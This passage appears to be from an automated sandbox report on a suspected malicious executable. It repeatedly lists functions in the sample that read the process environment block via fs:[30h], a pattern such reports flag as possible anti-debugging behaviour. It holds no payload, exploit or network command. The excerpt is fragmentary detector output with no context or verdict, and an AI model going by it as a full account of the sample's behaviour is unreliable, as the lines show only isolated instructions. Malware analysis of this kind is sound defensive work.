            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AA30B mov eax, dword ptr fs:[00000030h]2_2_015AA30B
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015783C0 mov eax, dword ptr fs:[00000030h]2_2_015783C0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015783C0 mov eax, dword ptr fs:[00000030h]2_2_015783C0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015783C0 mov eax, dword ptr fs:[00000030h]2_2_015783C0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015783C0 mov eax, dword ptr fs:[00000030h]2_2_015783C0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0157A3C0 mov eax, dword ptr fs:[00000030h]2_2_0157A3C0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0157A3C0 mov eax, dword ptr fs:[00000030h]2_2_0157A3C0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0157A3C0 mov eax, dword ptr fs:[00000030h]2_2_0157A3C0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0157A3C0 mov eax, dword ptr fs:[00000030h]2_2_0157A3C0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0157A3C0 mov eax, dword ptr fs:[00000030h]2_2_0157A3C0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0157A3C0 mov eax, dword ptr fs:[00000030h]2_2_0157A3C0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F63C0 mov eax, dword ptr fs:[00000030h]2_2_015F63C0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A63FF mov eax, dword ptr fs:[00000030h]2_2_015A63FF
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0158E3F0 mov eax, dword ptr fs:[00000030h]2_2_0158E3F0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0158E3F0 mov eax, dword ptr fs:[00000030h]2_2_0158E3F0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0158E3F0 mov eax, dword ptr fs:[00000030h]2_2_0158E3F0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0162C3CD mov eax, dword ptr fs:[00000030h]2_2_0162C3CD
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015803E9 mov eax, dword ptr fs:[00000030h]2_2_015803E9
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015803E9 mov eax, dword ptr fs:[00000030h]2_2_015803E9
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015803E9 mov eax, dword ptr fs:[00000030h]2_2_015803E9
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015803E9 mov eax, dword ptr fs:[00000030h]2_2_015803E9
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015803E9 mov eax, dword ptr fs:[00000030h]2_2_015803E9
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015803E9 mov eax, dword ptr fs:[00000030h]2_2_015803E9
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015803E9 mov eax, dword ptr fs:[00000030h]2_2_015803E9
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015803E9 mov eax, dword ptr fs:[00000030h]2_2_015803E9
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_016143D4 mov eax, dword ptr fs:[00000030h]2_2_016143D4
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_016143D4 mov eax, dword ptr fs:[00000030h]2_2_016143D4
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0161E3DB mov eax, dword ptr fs:[00000030h]2_2_0161E3DB
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0161E3DB mov eax, dword ptr fs:[00000030h]2_2_0161E3DB
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0161E3DB mov ecx, dword ptr fs:[00000030h]2_2_0161E3DB
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0161E3DB mov eax, dword ptr fs:[00000030h]2_2_0161E3DB
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01568397 mov eax, dword ptr fs:[00000030h]2_2_01568397
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01568397 mov eax, dword ptr fs:[00000030h]2_2_01568397
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01568397 mov eax, dword ptr fs:[00000030h]2_2_01568397
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159438F mov eax, dword ptr fs:[00000030h]2_2_0159438F
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159438F mov eax, dword ptr fs:[00000030h]2_2_0159438F
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0156E388 mov eax, dword ptr fs:[00000030h]2_2_0156E388
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0156E388 mov eax, dword ptr fs:[00000030h]2_2_0156E388
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0156E388 mov eax, dword ptr fs:[00000030h]2_2_0156E388
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0156A250 mov eax, dword ptr fs:[00000030h]2_2_0156A250
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01576259 mov eax, dword ptr fs:[00000030h]2_2_01576259
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01620274 mov eax, dword ptr fs:[00000030h]2_2_01620274
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01620274 mov eax, dword ptr fs:[00000030h]2_2_01620274
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01620274 mov eax, dword ptr fs:[00000030h]2_2_01620274
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01620274 mov eax, dword ptr fs:[00000030h]2_2_01620274
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01620274 mov eax, dword ptr fs:[00000030h]2_2_01620274
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01620274 mov eax, dword ptr fs:[00000030h]2_2_01620274
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01620274 mov eax, dword ptr fs:[00000030h]2_2_01620274
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01620274 mov eax, dword ptr fs:[00000030h]2_2_01620274
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01620274 mov eax, dword ptr fs:[00000030h]2_2_01620274
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01620274 mov eax, dword ptr fs:[00000030h]2_2_01620274
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01620274 mov eax, dword ptr fs:[00000030h]2_2_01620274
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01620274 mov eax, dword ptr fs:[00000030h]2_2_01620274
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F8243 mov eax, dword ptr fs:[00000030h]2_2_015F8243
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F8243 mov ecx, dword ptr fs:[00000030h]2_2_015F8243
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01574260 mov eax, dword ptr fs:[00000030h]2_2_01574260
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01574260 mov eax, dword ptr fs:[00000030h]2_2_01574260
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01574260 mov eax, dword ptr fs:[00000030h]2_2_01574260
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0156826B mov eax, dword ptr fs:[00000030h]2_2_0156826B
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0156823B mov eax, dword ptr fs:[00000030h]2_2_0156823B
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0157A2C3 mov eax, dword ptr fs:[00000030h]2_2_0157A2C3
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0157A2C3 mov eax, dword ptr fs:[00000030h]2_2_0157A2C3
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0157A2C3 mov eax, dword ptr fs:[00000030h]2_2_0157A2C3
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0157A2C3 mov eax, dword ptr fs:[00000030h]2_2_0157A2C3
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0157A2C3 mov eax, dword ptr fs:[00000030h]2_2_0157A2C3
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015802E1 mov eax, dword ptr fs:[00000030h]2_2_015802E1
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015802E1 mov eax, dword ptr fs:[00000030h]2_2_015802E1
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015802E1 mov eax, dword ptr fs:[00000030h]2_2_015802E1
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_016062A0 mov eax, dword ptr fs:[00000030h]2_2_016062A0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_016062A0 mov ecx, dword ptr fs:[00000030h]2_2_016062A0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_016062A0 mov eax, dword ptr fs:[00000030h]2_2_016062A0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_016062A0 mov eax, dword ptr fs:[00000030h]2_2_016062A0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_016062A0 mov eax, dword ptr fs:[00000030h]2_2_016062A0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_016062A0 mov eax, dword ptr fs:[00000030h]2_2_016062A0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F0283 mov eax, dword ptr fs:[00000030h]2_2_015F0283
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F0283 mov eax, dword ptr fs:[00000030h]2_2_015F0283
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F0283 mov eax, dword ptr fs:[00000030h]2_2_015F0283
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AE284 mov eax, dword ptr fs:[00000030h]2_2_015AE284
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AE284 mov eax, dword ptr fs:[00000030h]2_2_015AE284
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015802A0 mov eax, dword ptr fs:[00000030h]2_2_015802A0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015802A0 mov eax, dword ptr fs:[00000030h]2_2_015802A0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01578550 mov eax, dword ptr fs:[00000030h]2_2_01578550
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01578550 mov eax, dword ptr fs:[00000030h]2_2_01578550
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A656A mov eax, dword ptr fs:[00000030h]2_2_015A656A
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A656A mov eax, dword ptr fs:[00000030h]2_2_015A656A
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A656A mov eax, dword ptr fs:[00000030h]2_2_015A656A
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01606500 mov eax, dword ptr fs:[00000030h]2_2_01606500
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01644500 mov eax, dword ptr fs:[00000030h]2_2_01644500
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01644500 mov eax, dword ptr fs:[00000030h]2_2_01644500
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01644500 mov eax, dword ptr fs:[00000030h]2_2_01644500
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01644500 mov eax, dword ptr fs:[00000030h]2_2_01644500
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01644500 mov eax, dword ptr fs:[00000030h]2_2_01644500
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01644500 mov eax, dword ptr fs:[00000030h]2_2_01644500
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01644500 mov eax, dword ptr fs:[00000030h]2_2_01644500
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159E53E mov eax, dword ptr fs:[00000030h]2_2_0159E53E
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159E53E mov eax, dword ptr fs:[00000030h]2_2_0159E53E
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159E53E mov eax, dword ptr fs:[00000030h]2_2_0159E53E
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159E53E mov eax, dword ptr fs:[00000030h]2_2_0159E53E
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159E53E mov eax, dword ptr fs:[00000030h]2_2_0159E53E
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01580535 mov eax, dword ptr fs:[00000030h]2_2_01580535
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01580535 mov eax, dword ptr fs:[00000030h]2_2_01580535
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01580535 mov eax, dword ptr fs:[00000030h]2_2_01580535
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01580535 mov eax, dword ptr fs:[00000030h]2_2_01580535
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01580535 mov eax, dword ptr fs:[00000030h]2_2_01580535
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01580535 mov eax, dword ptr fs:[00000030h]2_2_01580535
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015765D0 mov eax, dword ptr fs:[00000030h]2_2_015765D0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AA5D0 mov eax, dword ptr fs:[00000030h]2_2_015AA5D0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AA5D0 mov eax, dword ptr fs:[00000030h]2_2_015AA5D0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AE5CF mov eax, dword ptr fs:[00000030h]2_2_015AE5CF
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AE5CF mov eax, dword ptr fs:[00000030h]2_2_015AE5CF
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015725E0 mov eax, dword ptr fs:[00000030h]2_2_015725E0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AC5ED mov eax, dword ptr fs:[00000030h]2_2_015AC5ED
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AC5ED mov eax, dword ptr fs:[00000030h]2_2_015AC5ED
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159E5E7 mov eax, dword ptr fs:[00000030h]2_2_0159E5E7
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159E5E7 mov eax, dword ptr fs:[00000030h]2_2_0159E5E7
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159E5E7 mov eax, dword ptr fs:[00000030h]2_2_0159E5E7
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159E5E7 mov eax, dword ptr fs:[00000030h]2_2_0159E5E7
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159E5E7 mov eax, dword ptr fs:[00000030h]2_2_0159E5E7
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159E5E7 mov eax, dword ptr fs:[00000030h]2_2_0159E5E7
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159E5E7 mov eax, dword ptr fs:[00000030h]2_2_0159E5E7
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159E5E7 mov eax, dword ptr fs:[00000030h]2_2_0159E5E7
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AE59C mov eax, dword ptr fs:[00000030h]2_2_015AE59C
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A4588 mov eax, dword ptr fs:[00000030h]2_2_015A4588
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01572582 mov eax, dword ptr fs:[00000030h]2_2_01572582
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01572582 mov ecx, dword ptr fs:[00000030h]2_2_01572582
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015945B1 mov eax, dword ptr fs:[00000030h]2_2_015945B1
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015945B1 mov eax, dword ptr fs:[00000030h]2_2_015945B1
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F05A7 mov eax, dword ptr fs:[00000030h]2_2_015F05A7
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F05A7 mov eax, dword ptr fs:[00000030h]2_2_015F05A7
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F05A7 mov eax, dword ptr fs:[00000030h]2_2_015F05A7
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159245A mov eax, dword ptr fs:[00000030h]2_2_0159245A
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0156645D mov eax, dword ptr fs:[00000030h]2_2_0156645D
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AE443 mov eax, dword ptr fs:[00000030h]2_2_015AE443
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AE443 mov eax, dword ptr fs:[00000030h]2_2_015AE443
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AE443 mov eax, dword ptr fs:[00000030h]2_2_015AE443
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AE443 mov eax, dword ptr fs:[00000030h]2_2_015AE443
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AE443 mov eax, dword ptr fs:[00000030h]2_2_015AE443
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AE443 mov eax, dword ptr fs:[00000030h]2_2_015AE443
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AE443 mov eax, dword ptr fs:[00000030h]2_2_015AE443
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AE443 mov eax, dword ptr fs:[00000030h]2_2_015AE443
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159A470 mov eax, dword ptr fs:[00000030h]2_2_0159A470
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159A470 mov eax, dword ptr fs:[00000030h]2_2_0159A470
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159A470 mov eax, dword ptr fs:[00000030h]2_2_0159A470
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015FC460 mov ecx, dword ptr fs:[00000030h]2_2_015FC460
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A8402 mov eax, dword ptr fs:[00000030h]2_2_015A8402
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A8402 mov eax, dword ptr fs:[00000030h]2_2_015A8402
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A8402 mov eax, dword ptr fs:[00000030h]2_2_015A8402
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0156C427 mov eax, dword ptr fs:[00000030h]2_2_0156C427
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0156E420 mov eax, dword ptr fs:[00000030h]2_2_0156E420
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0156E420 mov eax, dword ptr fs:[00000030h]2_2_0156E420
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0156E420 mov eax, dword ptr fs:[00000030h]2_2_0156E420
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F6420 mov eax, dword ptr fs:[00000030h]2_2_015F6420
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F6420 mov eax, dword ptr fs:[00000030h]2_2_015F6420
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F6420 mov eax, dword ptr fs:[00000030h]2_2_015F6420
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F6420 mov eax, dword ptr fs:[00000030h]2_2_015F6420
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F6420 mov eax, dword ptr fs:[00000030h]2_2_015F6420
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F6420 mov eax, dword ptr fs:[00000030h]2_2_015F6420
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F6420 mov eax, dword ptr fs:[00000030h]2_2_015F6420
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015704E5 mov ecx, dword ptr fs:[00000030h]2_2_015704E5
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A44B0 mov ecx, dword ptr fs:[00000030h]2_2_015A44B0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015FA4B0 mov eax, dword ptr fs:[00000030h]2_2_015FA4B0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015764AB mov eax, dword ptr fs:[00000030h]2_2_015764AB
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015FE75D mov eax, dword ptr fs:[00000030h]2_2_015FE75D
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01570750 mov eax, dword ptr fs:[00000030h]2_2_01570750
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F4755 mov eax, dword ptr fs:[00000030h]2_2_015F4755
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2750 mov eax, dword ptr fs:[00000030h]2_2_015B2750
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2750 mov eax, dword ptr fs:[00000030h]2_2_015B2750
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A674D mov esi, dword ptr fs:[00000030h]2_2_015A674D
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A674D mov eax, dword ptr fs:[00000030h]2_2_015A674D
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A674D mov eax, dword ptr fs:[00000030h]2_2_015A674D
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01578770 mov eax, dword ptr fs:[00000030h]2_2_01578770
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01580770 mov eax, dword ptr fs:[00000030h]2_2_01580770
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01580770 mov eax, dword ptr fs:[00000030h]2_2_01580770
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01580770 mov eax, dword ptr fs:[00000030h]2_2_01580770
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01580770 mov eax, dword ptr fs:[00000030h]2_2_01580770
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01580770 mov eax, dword ptr fs:[00000030h]2_2_01580770
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01580770 mov eax, dword ptr fs:[00000030h]2_2_01580770
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01580770 mov eax, dword ptr fs:[00000030h]2_2_01580770
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01580770 mov eax, dword ptr fs:[00000030h]2_2_01580770
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01580770 mov eax, dword ptr fs:[00000030h]2_2_01580770
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01580770 mov eax, dword ptr fs:[00000030h]2_2_01580770
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01580770 mov eax, dword ptr fs:[00000030h]2_2_01580770
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01580770 mov eax, dword ptr fs:[00000030h]2_2_01580770
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01570710 mov eax, dword ptr fs:[00000030h]2_2_01570710
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A0710 mov eax, dword ptr fs:[00000030h]2_2_015A0710
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AC700 mov eax, dword ptr fs:[00000030h]2_2_015AC700
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A273C mov eax, dword ptr fs:[00000030h]2_2_015A273C
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A273C mov ecx, dword ptr fs:[00000030h]2_2_015A273C
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A273C mov eax, dword ptr fs:[00000030h]2_2_015A273C
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015EC730 mov eax, dword ptr fs:[00000030h]2_2_015EC730
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AC720 mov eax, dword ptr fs:[00000030h]2_2_015AC720
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AC720 mov eax, dword ptr fs:[00000030h]2_2_015AC720
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0157C7C0 mov eax, dword ptr fs:[00000030h]2_2_0157C7C0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F07C3 mov eax, dword ptr fs:[00000030h]2_2_015F07C3
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015747FB mov eax, dword ptr fs:[00000030h]2_2_015747FB
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015747FB mov eax, dword ptr fs:[00000030h]2_2_015747FB
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015927ED mov eax, dword ptr fs:[00000030h]2_2_015927ED
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015927ED mov eax, dword ptr fs:[00000030h]2_2_015927ED
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015927ED mov eax, dword ptr fs:[00000030h]2_2_015927ED
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015FE7E1 mov eax, dword ptr fs:[00000030h]2_2_015FE7E1
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0161678E mov eax, dword ptr fs:[00000030h]2_2_0161678E
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015707AF mov eax, dword ptr fs:[00000030h]2_2_015707AF
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0163866E mov eax, dword ptr fs:[00000030h]2_2_0163866E
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0163866E mov eax, dword ptr fs:[00000030h]2_2_0163866E
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0158C640 mov eax, dword ptr fs:[00000030h]2_2_0158C640
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A2674 mov eax, dword ptr fs:[00000030h]2_2_015A2674
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AA660 mov eax, dword ptr fs:[00000030h]2_2_015AA660
